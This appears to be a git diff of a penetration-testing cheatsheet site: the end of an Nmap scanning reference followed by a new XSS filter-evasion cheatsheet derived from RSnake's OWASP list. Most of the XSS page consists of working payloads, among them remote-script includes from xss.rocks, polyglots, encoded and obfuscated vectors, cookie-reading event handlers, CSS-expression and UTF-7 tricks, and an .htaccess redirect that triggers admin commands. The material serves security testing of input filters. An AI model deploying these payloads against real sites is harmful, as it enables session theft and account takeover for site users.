Output Switch Description Example -oN nmap 192.168.1.1 -oN normal.file Normal output to the file normal.file -oX nmap 192.168.1.1 -oX xml.file XML output to the file xml.file -oG nmap 192.168.1.1 -oG grep.file Grepable output to the file grep.file -oA nmap 192.168.1.1 -oA results Output in the three major formats at once -oG - nmap 192.168.1.1 -oG - Grepable output to screen. -oN -, -oX - also usable --append-output nmap 192.168.1.1 -oN file.file --append-output Append a scan to a previous scan file -v nmap 192.168.1.1 -v Increase the verbosity level (use -vv or more for greater effect) -d nmap 192.168.1.1 -d Increase debugging level (use -dd or more for greater effect) --reason nmap 192.168.1.1 --reason Display the reason a port is in a particular state, same output as -vv --open nmap 192.168.1.1 --open Only show open (or possibly open) ports --packet-trace nmap 192.168.1.1 -T4 --packet-trace Show all packets sent and received --iflist nmap --iflist Shows the host interfaces and routes --resume nmap --resume results.file Resume a scan
Helpful Nmap Output examples Scan for web servers and grep to show which IPs are running web servers
nmap -p80 -sV -oG - --open 192 .168.1.1/24 | grep open
+
Generate a list of the IPs of live hosts
nmap -iR 10 -n -oX out.xml | grep "Nmap" | cut -d " " -f5 > live-hosts.txt
+
Append IP to the list of live hosts
nmap -iR 10 -n -oX out2.xml | grep "Nmap" | cut -d " " -f5 >> live-hosts.txt
+
Compare output from nmap using the ndif
ndiff scanl.xml scan2.xml
+
Convert nmap xml files to html files
xsltproc nmap.xml -o nmap.html
+
Reverse sorted list of how often ports turn up
grep " open " results.nmap | sed -r 's/ +/ /g' | sort | uniq -c | sort -rn | less
+
Miscellaneous Options Switch Description Example -6 nmap -6 2607:f0d0:1002:51::4 Enable IPv6 scanning -h nmap -h nmap help screen
Other Useful Nmap Commands Discovery only on ports x, no port scan
nmap -iR 10 -PS22-25,80,113,1050,35000 -v -sn
+
Arp discovery only on local network, no port scan
nmap 192 .168.1.1-1/24 -PR -sn -vv
+
Traceroute to random targets, no port scan
nmap -iR 10 -sn -traceroute
+
Query the Internal DNS for hosts, list targets only
nmap 192 .168.1.1-50 -sL --dns-server 192 .168.1.1
+
Back to top
\ No newline at end of file
diff --git a/penetration-testing/cheatsheets/xss-cheatsheet/index.html b/penetration-testing/cheatsheets/xss-cheatsheet/index.html
new file mode 100644
index 000000000..c2c8ba6ba
--- /dev/null
+++ b/penetration-testing/cheatsheets/xss-cheatsheet/index.html
@@ -0,0 +1,372 @@
+ XSS CheatSheet - 3os penetration-testing tools cheatsheet Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-05 XSS CheatSheet Introduction This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing. The initial contents of this article were donated to OWASP by RSnake, from his seminal XSS CheatSheet, which was at: http://ha.ckers.org/xss.html
. That site now redirects to its new home here, where we plan to maintain and enhance it. The very first OWASP Prevention CheatSheet, the Cross Site Scripting Prevention CheatSheet , was inspired by RSnake's XSS CheatSheet, so we can thank RSnake for our inspiration. We wanted to create short, simple guidelines that developers could follow to prevent XSS, rather than simply telling developers to build apps that could protect against all the fancy tricks specified in rather complex attack CheatSheet, and so the OWASP CheatSheet Series was born.
This CheatSheet lists a series of XSS attacks that can be used to bypass certain XSS defensive filters. Please note that input filtering is an incomplete defense for XSS which these tests can be used to illustrate.
Basic XSS Test Without Filter Evasion This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):
< SCRIPT SRC = http://xss.rocks/xss.js ></ SCRIPT >
+
XSS Locator (Polyglot) The following is a "polyglot test XSS payload." This test will execute in multiple contexts including html, script string, js and url. Thank you to Gareth Heyes for this contribution .
`javascript:/*--></ title ></ style ></ textarea ></ script ></ xmp >< svg / onload = '+/"/+/onmouseover=1/+/[*/[]/+alert(1)//' >
+
Image XSS Using the JavaScript Directive Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well:
< img src = "javascript:alert('XSS');" />
+
No Quotes and no Semicolon < IMG SRC = javascript:alert('XSS') >
+
Case Insensitive XSS Attack Vector < IMG SRC = JaVaScRiPt:alert('XSS') >
+
HTML Entities The semicolons are required for this to work:
< img src = 'javascript:alert("XSS")' />
+
Grave Accent Obfuscation If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents:
< IMG SRC = `javascript:alert("RSnake says , ' XSS '")` >
+
Skip the HREF attribute and get to the meat of the XXS... Submitted by David Cross ~ Verified on Chrome
`\< a onmouseover = "alert(document.cookie)" \ > xxs link\< /a\>
+
or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.
`\< a onmouseover = alert(document.cookie)\ > xxs link\< /a\>
+
Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tags:
< IMG """ >
+< script >
+ alert ( 'XSS' );
+</ script >
+"\>
+
fromCharCode If no quotes of any kind are allowed you can eval()
a fromCharCode
in JavaScript to create any XSS vector you need:
< img src = "javascript:alert(String.fromCharCode(88,83,83))" />
+
Default SRC Tag to Get Past Filters that Check SRC Domain This will bypass most SRC domain filters. Inserting javascript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted like onblur
, onclick
giving you an extensive amount of variations for many injections listed here. Submitted by David Cross .
< img src = "#" onmouseover = "alert('xxs')" />
+
Default SRC Tag by Leaving it Empty < img src = "onmouseover" =" alert (' xxs ')" />
+
Default SRC Tag by Leaving it out Entirely < img onmouseover = "alert('xxs')" />
+
On Error Alert < IMG SRC = / onerror = "alert(String.fromCharCode(88,83,83))" ></ img >
+
IMG onerror and JavaScript Alert Encode < img src = x onerror = "javascript:alert('XSS')" >
+
Decimal HTML Character References All of the XSS examples that use a javascript: directive inside of an <IMG
tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).
< img
+ src = "javascript:alert('XSS')"
+/>
+
Decimal HTML Character References Without Trailing Semicolons This is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding - up to 7 numeric characters total. This is also useful against people who decode against strings like \(tmp_string =\~ s/.\*\\&\#(\\d+);.\*/\) 1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I've seen this in the wild):
< img
+ src = "javascript:alert('XSS')"
+/>
+
Hexadecimal HTML Character References Without Trailing Semicolons This is also a viable XSS attack against the above string \(tmp_string=\~ s/.\*\\&\#(\\d+);.\*/\) 1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).
< img
+ src = "javascript:alert('XSS')"
+/>
+
Embedded Tab Used to break up the cross site scripting attack:
< img src = "jav ascript:alert('XSS');" />
+
Embedded Encoded Tab Use this one to break up XSS :
< img src = "jav	ascript:alert('XSS');" />
+
Embedded Newline to Break-up XSS Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector:
< img src = "jav
ascript:alert('XSS');" />
+
Embedded Carriage Return to Break-up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):
< img src = "jav
ascript:alert('XSS');" />
+
Null breaks up JavaScript Directive Null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00
in the URL string or if you want to write your own injection tool you can either use vim (^V^@
will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00
is much more useful and helped me bypass certain real world filters with a variation on this example:
`perl -e 'print "< IMG SRC = java\0script:alert(\"XSS\") > ";' > out`
+
This is useful if the pattern match doesn't take into account spaces in the word javascript:
-which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the javascript:
keyword. The actual reality is you can have any char from 1-32 in decimal:
< img src = "  javascript:alert('XSS');" />
+
Non-alpha-non-digit XSS The Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example \<SCRIPT\\s
!= \<SCRIPT/XSS\\s
:
< SCRIPT / XSS SRC = "http://xss.rocks/xss.js" ></ SCRIPT >
+
Based on the same idea as above, however, expanded on it, using the RSnake fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char as seen here:
< BODY onload !#$%&()*~+ -_ ., : ;?@[/|\]^`= alert (" XSS ") >
+
Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.
< SCRIPT / SRC = "http://xss.rocks/xss.js" ></ SCRIPT >
+
Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to suppress a JavaScript error:
<
+< script >
+ alert ( 'XSS' ); //\<
+</ script >
+
In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the \></SCRIPT>
portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally, although beware, I have no idea what the HTML will end up looking like once this is injected:
< SCRIPT SRC = http://xss.rocks/xss.js?< B >
+
This particular variant was submitted by Łukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT>
tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.
< SCRIPT SRC = //xss.rocks/.j >
+
Half Open HTML/JavaScript XSS Vector Unlike Firefox the IE rendering engine doesn't add extra data to you page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes there is any HTML tag below where you are injecting this cross site scripting vector. Even though there is no close ">" tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\\%3D)|(=))\[^\\n\]\*((\\%3C)|\<)\[^\\n\]+((\\%3E)|\>)/
because it doesn't require the end ">". As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME
tag instead of an <IMG
tag:
< IMG SRC = "`<javascript:alert>`('XSS')" `
+
Double Open Angle Brackets Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:
< iframe src = http://xss.rocks/scriptlet.html <`
+
Escaping JavaScript Escapes When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a="$ENV{QUERY\_STRING}";</SCRIPT>
and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this gets injected it will read <SCRIPT>var a="\\\\";alert('XSS');//";</SCRIPT>
which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method.:
An alternative, if correct JSON or Javascript escaping has been applied to the embedded data but not HTML encoding, is to finish the script block and start your own:
</ script >< script > alert ( 'XSS' );</ script >
+
End Title Tag This is a simple XSS vector that closes <TITLE>
tags, which can encapsulate the malicious cross site scripting attack:
</ TITLE >< SCRIPT > alert ( "XSS" );</ SCRIPT >
+
< input type = "IMAGE" src = "javascript:alert('XSS');" />
+
BODY Image < body background = "javascript:alert('XSS')" ></ body >
+
IMG Dynsrc < img DYNSRC = "javascript:alert('XSS')" />
+
IMG Lowsrc < img LOWSRC = "javascript:alert('XSS')" />
+
List-style-image Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:
< STYLE > li { list-style-image : url ( "javascript:alert('XSS')" );}</ STYLE >< UL >< LI > XSS</ br >
+
VBscript in an Image < img src = 'vbscript:msgbox("XSS")' />
+
Livescript (older versions of Netscape only) < img src = "livescript:[code]" />
+
SVG Object Tag < svg / onload = alert('XSS') >
+
ECMAScript 6 Set.constructor`alert\x28document.domain\x29
+
BODY Tag Method doesn't require using any variants of javascript:
or <SCRIPT...
to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign (onload=
!= onload =
):
< BODY ONLOAD = alert('XSS') >
+
Event Handlers It can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Thanks to Rene Ledosquet for the HTML+TIME updates.
FSCommand()
(attacker can use this when executed from within an embedded Flash object) onAbort()
(when user aborts the loading of an image) onActivate()
(when object is set as the active element) onAfterPrint()
(activates after user prints or previews print job) onAfterUpdate()
(activates on data object after updating data in the source object) onBeforeActivate()
(fires before the object is set as the active element) onBeforeCopy()
(attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand("Copy")
function) onBeforeCut()
(attacker executes the attack string right before a selection is cut) onBeforeDeactivate()
(fires right after the activeElement is changed from the current object) onBeforeEditFocus()
(Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected) onBeforePaste()
(user needs to be tricked into pasting or be forced into it using the execCommand("Paste")
function) onBeforePrint()
(user would need to be tricked into printing or attacker could use the print()
or execCommand("Print")
function). onBeforeUnload()
(user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent) onBeforeUpdate()
(activates on data object before updating data in the source object) onBegin()
(the onbegin event fires immediately when the element's timeline begins) onBlur()
(in the case where another popup is loaded and window looses focus) onBounce()
(fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window) onCellChange()
(fires when data changes in the data provider) onChange()
(select, text, or TEXTAREA field loses focus and its value has been modified) onClick()
(someone clicks on a form) onContextMenu()
(user would need to right click on attack area) onControlSelect()
(fires when the user is about to make a control selection of the object) onCopy()
(user needs to copy something or it can be exploited using the execCommand("Copy")
command) onCut()
(user needs to copy something or it can be exploited using the execCommand("Cut")
command) onDataAvailable()
(user would need to change data in an element, or attacker could perform the same function) onDataSetChanged()
(fires when the data set exposed by a data source object changes) onDataSetComplete()
(fires to indicate that all data is available from the data source object) onDblClick()
(user double-clicks a form element or a link) onDeactivate()
(fires when the activeElement is changed from the current object to another object in the parent document) onDrag()
(requires that the user drags an object) onDragEnd()
(requires that the user drags an object) onDragLeave()
(requires that the user drags an object off a valid location) onDragEnter()
(requires that the user drags an object into a valid location) onDragOver()
(requires that the user drags an object into a valid location) onDragDrop()
(user drops an object (e.g. file) onto the browser window) onDragStart()
(occurs when user starts drag operation) onDrop()
(user drops an object (e.g. file) onto the browser window) onEnd()
(the onEnd event fires when the timeline ends. onError()
(loading of a document or image causes an error) onErrorUpdate()
(fires on a databound object when an error occurs while updating the associated data in the data source object) onFilterChange()
(fires when a visual filter completes state change) onFinish()
(attacker can create the exploit when marquee is finished looping) onFocus()
(attacker executes the attack string when the window gets focus) onFocusIn()
(attacker executes the attack string when window gets focus) onFocusOut()
(attacker executes the attack string when window looses focus) onHashChange()
(fires when the fragment identifier part of the document's current address changed) onHelp()
(attacker executes the attack string when users hits F1 while the window is in focus) onInput()
(the text content of an element is changed through the user interface) onKeyDown()
(user depresses a key) onKeyPress()
(user presses or holds down a key) onKeyUp()
(user releases a key) onLayoutComplete()
(user would have to print or print preview) onLoad()
(attacker executes the attack string after the window loads) onLoseCapture()
(can be exploited by the releaseCapture()
method) onMediaComplete()
(When a streaming media file is used, this event could fire before the file starts playing) onMediaError()
(User opens a page in the browser that contains a media file, and the event fires when there is a problem) onMessage()
(fire when the document received a message) onMouseDown()
(the attacker would need to get the user to click on an image) onMouseEnter()
(cursor moves over an object or area) onMouseLeave()
(the attacker would need to get the user to mouse over an image or table and then off again) onMouseMove()
(the attacker would need to get the user to mouse over an image or table) onMouseOut()
(the attacker would need to get the user to mouse over an image or table and then off again) onMouseOver()
(cursor moves over an object or area) onMouseUp()
(the attacker would need to get the user to click on an image) onMouseWheel()
(the attacker would need to get the user to use their mouse wheel) onMove()
(user or attacker would move the page) onMoveEnd()
(user or attacker would move the page) onMoveStart()
(user or attacker would move the page) onOffline()
(occurs if the browser is working in online mode and it starts to work offline) onOnline()
(occurs if the browser is working in offline mode and it starts to work online) onOutOfSync()
(interrupt the element's ability to play its media as defined by the timeline) onPaste()
(user would need to paste or attacker could use the execCommand("Paste")
function) onPause()
(the onpause event fires on every element that is active when the timeline pauses, including the body element) onPopState()
(fires when user navigated the session history) onProgress()
(attacker would use this as a flash movie was loading) onPropertyChange()
(user or attacker would need to change an element property) onReadyStateChange()
(user or attacker would need to change an element property) onRedo()
(user went forward in undo transaction history) onRepeat()
(the event fires once for each repetition of the timeline, excluding the first full cycle) onReset()
(user or attacker resets a form) onResize()
(user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>
) onResizeEnd()
(user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>
) onResizeStart()
(user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>
) onResume()
(the onresume event fires on every element that becomes active when the timeline resumes, including the body element) onReverse()
(if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward) onRowsEnter()
(user or attacker would need to change a row in a data source) onRowExit()
(user or attacker would need to change a row in a data source) onRowDelete()
(user or attacker would need to delete a row in a data source) onRowInserted()
(user or attacker would need to insert a row in a data source) onScroll()
(user would need to scroll, or attacker could use the scrollBy()
function) onSeek()
(the onreverse event fires when the timeline is set to play in any direction other than forward) onSelect()
(user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");
) onSelectionChange()
(user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");
) onSelectStart()
(user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");
) onStart()
(fires at the beginning of each marquee loop) onStop()
(user would need to press the stop button or leave the webpage) onStorage()
(storage area changed) onSyncRestored()
(user interrupts the element's ability to play its media as defined by the timeline to fire) onSubmit()
(requires attacker or user submits a form) onTimeError()
(user or attacker sets a time property, such as dur, to an invalid value) onTrackChange()
(user or attacker changes track in a playList) onUndo()
(user went backward in undo transaction history) onUnload()
(as the user clicks any link or presses the back button or attacker forces a click) onURLFlip()
(this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file) seekSegmentTime()
(this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.) BGSOUND < bgsound SRC = "javascript:alert('XSS');" ></ bgsound >
+
& JavaScript includes < br SIZE = "&{alert('XSS')}" />
+
STYLE sheet < link rel = "stylesheet" href = "javascript:alert('XSS');" />
+
Remote style sheet Using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression. This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:
< link rel = "stylesheet" href = "http://xss.rocks/xss.css" />
+
Remote style sheet part 2 This works the same as above, but uses a <STYLE>
tag instead of a <LINK>
tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE>
tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:
< style >
+ @ import 'http://xss.rocks/xss.css' ;
+</ style >
+
Remote style sheet part 3 This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://xss.rocks/xss.css>; REL=stylesheet
) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:
< meta http-equiv = "Link" content = "<http://xss.rocks/xss.css>; REL=stylesheet" />
+
Remote style sheet part 4 This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites:
< style >
+ BODY {
+ -moz- binding : url ( 'http://xss.rocks/xssmoz.xml#xss' );
+ }
+</ style >
+
This XSS at times sends IE into an infinite loop of alerts:
< style >
+ @ im \ port '\ja\vasc\ript:alert("XSS")' ;
+</ style >
+
Created by Roman Ivanov
< img style = "xss:expr/*XSS*/ession(alert('XSS'))" />
+
IMG STYLE with Expression This is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop:
exp/*< a
+ style = 'no\xss:noxss("*//*");
+xss:ex/*XSS*//*/*/pression(alert("XSS"))'
+></ a >
+
STYLE Tag (Older versions of Netscape only) < style type = "text/javascript" >
+ alert ( 'XSS' );
+</ style >
+
STYLE Tag using Background-image < style >
+ . XSS {
+ background-image : url ( "javascript:alert('XSS')" );
+ }</ style
+>< a class = "XSS" ></ a >
+
STYLE Tag using Background < style type = "text/css" >
+ BODY {
+ background : url ( "javascript:alert('XSS')" );
+ }</ style
+> ` `< style type = "text/css" >
+ BODY {
+ background : url ( "<javascript:alert>('XSS')" );
+ }
+</ style >
+
Anonymous HTML with STYLE Attribute IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter:
< XSS STYLE = "xss:expression(alert('XSS'))" ></ XSS >
+
Local htc File This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:
< XSS STYLE = "behavior: url(xss.htc);" ></ XSS >
+
US-ASCII Encoding US-ASCII encoding (found by Kurt Huwig).This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.
`¼script¾alert(¢XSS¢)¼/script¾`
+
The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs:
< meta http-equiv = "refresh" content = "0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" />
+
IFRAME If iframes are allowed there are a lot of other XSS problems as well:
< iframe src = "javascript:alert('XSS');" ></ iframe >
+
IFRAME Event Based IFrames and most other elements can use event based mayhem like the following... (Submitted by: David Cross)
< iframe src = "#" onmouseover = "alert(document.cookie)" ></ iframe >
+
FRAME Frames have the same sorts of XSS problems as iframes
< FRAMESET >< FRAME SRC = "javascript:alert('XSS');" ></ FRAMESET >
+
TABLE < table BACKGROUND = "javascript:alert('XSS')" ></ table >
+
TD Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors:
< table >
+ < td BACKGROUND = "javascript:alert('XSS')" ></ td >
+</ table >
+
DIV DIV Background-image < div style = "background-image: url(javascript:alert('XSS'))" ></ div >
+
DIV Background-image with Unicoded XSS Exploit This has been modified slightly to obfuscate the url parameter. The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:
< div
+ style = "background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"
+></ div >
+
Rnaske built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):
< div style = "background-image: url(javascript:alert('XSS'))" ></ div >
+
DIV Expression A variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression":
< div style = "width: expression(alert('XSS'));" ></ div >
+
Downlevel-Hidden Block Only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:
<!--[if gte IE 4]>
+ <script>
+ alert('XSS');
+ </script>
+<![endif]-->
+
BASE Tag Works in IE and Netscape 8.1 in safe mode. You need the //
to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like images/image.jpg
rather than full paths. If the path includes a leading forward slash like /images/image.jpg
you can remove one slash from this vector (as long as there are two to begin the comment this will work):
< base href = "javascript:alert('XSS');//" />
+
OBJECT Tag If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS:
< object type = "text/x-scriptlet" data = "http://xss.rocks/scriptlet.html" ></ object >
+
EMBED SVG Which Contains XSS Vector This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.
< EMBED SRC = "data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type = "image/svg+xml" AllowScriptAccess = "always" ></ EMBED >
+
Using ActionScript Inside Flash for Obfuscation a = 'get' ;
+b = 'URL("' ;
+c = 'javascript:' ;
+d = "alert('XSS');\")" ;
+eval ( a + b + c + d );
+
XML Data Island with CDATA Obfuscation This XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult while auditing Yahoo:
<XML ID= "xss" ><I><B><IMG SRC= "javas<!-- -->cript:alert('XSS')" ></B></I></XML>
+<SPAN DATASRC= "#xss" DATAFLD= "B" DATAFORMATAS= "HTML" ></SPAN>
+
Locally hosted XML with embedded JavaScript that is generated using an XML data island This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here:
<XML SRC= "xsstest.xml" ID= I ></XML>
+<SPAN DATASRC= #I DATAFLD= C DATAFORMATAS= HTML ></SPAN>
+
HTML+TIME in XML This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work:
< html >
+ < body >
+ < ?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
+ < ?import namespace="t" implementation="#default#time2">
+ < t:set attributeName = "innerHTML" to = "XSS
+ <script defer>
+ alert('XSS');
+ </script>
+ " >
+ </ body >
+</ html >
+
Assuming you can only fit in a few characters and it filters against .js
You can rename your JavaScript file to an image as an XSS vector:
< script src = "http://xss.rocks/xss.jpg" ></ script >
+
SSI (Server Side Includes) This requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:
<!-- # exec cmd = "/bin/echo '<SCR'" --> <!-- # exec cmd = "/bin/echo 'IPT SRC=http://xss.rocks/xss.js></SCRIPT>'" -->
+
PHP Requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues:
<? echo ( '<SCR)' ;
+echo ( 'IPT>alert("XSS")</SCRIPT>' ); ?>
+
IMG Embedded Commands This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors:
< img src = "http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" />
+
IMG Embedded Commands part II This is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="httx://badguy.com/a.jpg">
could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
Cookie Manipulation Admittedly this is pretty obscure but I have seen a few examples where <META
is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc...):
< meta http-equiv = "Set-Cookie" content = "USERID=<SCRIPT>alert('XSS')</SCRIPT>" />
+
UTF-7 Encoding If the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script.:
< head >
+ < meta http-equiv = "CONTENT-TYPE" content = "text/html; charset=UTF-7" /></ head
+> +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`
+
